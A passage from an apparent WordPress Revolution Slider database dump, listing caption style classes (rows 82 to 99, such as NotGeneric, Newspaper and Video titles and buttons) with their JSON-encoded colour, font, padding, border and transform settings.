\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(82,'.tp-caption.WebProduct-Title-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(83,'.tp-caption.WebProduct-SubTitle-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(84,'.tp-caption.WebProduct-Content-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(85,'.tp-caption.FatRounded','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"none\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"20px\",\"22px\",\"20px\",\"25px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.5\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(86,'.tp-caption.NotGeneric-Title','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"70px\",\"font-weight\":\"800\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 0px 10px 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"[object Object]\",\"hover\":\"\"}'),(87,'.tp-caption.NotGeneric-SubTitle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"4px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(88,'.tp-caption.NotGeneric-CallToAction','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 30px 10px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(89,'.tp-caption.NotGeneric-Icon','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"default\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(90,'.tp-caption.NotGeneric-Menuitem','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"27px 30px 27px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(91,'.tp-caption.MarkerStyle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Permanent Marker\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"text-align\":\"left\",\"0\":\"\"},\"hover\":\"\"}'),(92,'.tp-caption.Gym-Menuitem','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(93,'.tp-caption.Newspaper-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#FFFFFF\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"17px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(94,'.tp-caption.Newspaper-Subtitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#a8d8ee\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(95,'.tp-caption.Newspaper-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(96,'.tp-caption.Newspaper-Title-Centered','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"center\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(97,'.tp-caption.Hero-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(98,'.tp-caption.Video-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(99,'.tp-caption.Video-SubTitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\